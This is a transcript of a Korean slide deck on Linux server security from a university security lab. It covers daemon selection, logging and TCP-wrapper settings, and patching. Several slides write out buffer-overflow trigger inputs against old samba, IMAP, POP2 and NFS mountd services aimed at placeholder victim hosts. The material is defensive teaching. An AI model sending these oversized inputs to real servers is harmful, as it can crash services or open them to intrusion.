Presentation is loading. Please wait.

Presentation is loading. Please wait.

오 태 호 POSTECH Laboratory for UNIX Security

Similar presentations


Presentation on theme: "오 태 호 POSTECH Laboratory for UNIX Security"— Presentation transcript:

1 오 태 호 POSTECH Laboratory for UNIX Security ohhara@postech.edu
리눅스(Linux) 보안 오 태 호 POSTECH Laboratory for UNIX Security

2 목차 각종 데몬의 용도 몇 가지 보안 관련 설정 알려진 치명적인 버그들 버그 패치 방법

3 각종 데몬의 용도 (1) amd ( X ) bootparamd ( X ) gated ( X ) auto mount 데몬
오래된 Sun workstation을 network booting 할 때 사용 gated ( X ) routing 데몬

4 각종 데몬의 용도 (2) httpd ( O ) ircd ( X ) lpd ( O )
WWW ( World Wide Web ) 데몬 ircd ( X ) irc ( Internet relay chat ) 데몬 lpd ( O ) print를 할 때 사용하는 데몬

5 각종 데몬의 용도 (3) mcserv ( X ) named ( X ) nfs ( O )
mc ( midnight commander ) 데몬 named ( X ) DNS 서버 nfs ( O ) 다른 Unix계열 OS와 파일공유를 할 때 사용

6 각종 데몬의 용도 (4) portmap ( O ) routed ( X ) sendmail ( O )
RPC 서비스를 제공하는데 필요 routed ( X ) RIP을 지원하는 라우팅 데몬 sendmail ( O ) 을 받을 때 필요

7 각종 데몬의 용도 (5) smb ( O ) snmp ( X ) squid ( X )
MS Windows 계열 OS에서 Linux에 있는 파일이나 프린트를 사용할 때 사용 snmp ( X ) SNMP ( Simple Network Management Protocol ) 으로 네트워크 상황을 모니터링할 때 사용 squid ( X ) HTTP, FTP등의 서비스를 캐싱할 때 사용

8 각종 데몬의 용도 (6) syslog ( O ) xntpd ( X ) inet ( O )
시스템에서 일어나는 일들을 기록하는 데몬 xntpd ( X ) 시간을 정확히 맞추어 주는 데몬 inet ( O ) telnet, ftp등의 서비스를 제공해 주는 데몬

9 각종 데몬의 용도 (7) inet ftp ( O ) telnet ( O ) gopher ( X ) shell ( X )
login ( X ) talk / ntalk ( X ) pop-2 / pop-3 ( X )

10 각종 데몬의 용도 (8) inet ( cont. ) imap ( X ) finger ( X ) time ( X )
auth ( X )

11 몇 가지 보안 관련 설정 (1) /etc/syslog.conf *.debug /dev/console
/etc/smb.conf *.debug /dev/console *.debug @ *.debug /var/log/syslog/syslog hosts allow =

12 몇 가지 보안 관련 설정 (2) /etc/hosts.deny /etc/hosts.allow
ALL:ALL: spawn ((/usr/sbin/safe_finger | /bin/mail root)&) in.telnetd: , in.ftpd: , portmap: , rpc.mountd: , rpc.nfsd: ,

13 알려진 치명적인 버그들 (1) samba ( smbd )
$ smbclient \\\\VICTIM\\IPC$ aaaaa…(3100개)…aaaaa -I victim.com

14 알려진 치명적인 버그들 (2) bind ( named ) inverse query할 때 buffer overflow발생

15 알려진 치명적인 버그들 (3) imap ( imapd ) $ telnet victim.com 143
Trying XXX.XXX.XXX.XXX… Connected to victim.com. Escape character is ‘^]’. * OK victim.com IMAP4rev1 vXX.XXX server ready 1300 LOGIN “aaaaa…(1300개)…aaaaa” pass $ telnet victim.com 143 Trying XXX.XXX.XXX.XXX… Connected to victim.com. Escape character is ‘^]’. * OK victim.com IMAP4rev1 vXX.XXX server ready * AUTHENTICATE {1100} aaaaa…(1100개)…aaaaa

16 알려진 치명적인 버그들 (4) nfs-server ( mountd )
$ mount -t nfs victim.com:aaaaa…(1000개)…aaaaa /blahblah

17 알려진 치명적인 버그들 (5) wu-ftpd ( in.ftpd )
1024이상의 길이를 가진 directory를 만들고 지울 때 buffer overflow발생

18 알려진 치명적인 버그들 (6) imap ( ipop2d ) $ telnet target.com 109
Trying XXX.XXX.XXX.XXX... Connected to target.com. Escape character is '^]'. + POP2 target.com vX.XX server ready HELO target.com:ohhara ohharapass FOLD aaaaa...(1000개)...aaaaa

19 버그 패치 방법 패치 방법 권장 해당 프로그램을 homepage에서 받아 온다.
rpm -Uvh (package name) 을 각각 해 준다. 권장 가능하면 홈페이지에 올라오는 모든 패키지들을 주기적으로 업그레이드해 준다.


Download ppt "오 태 호 POSTECH Laboratory for UNIX Security"

Similar presentations


Ads by Google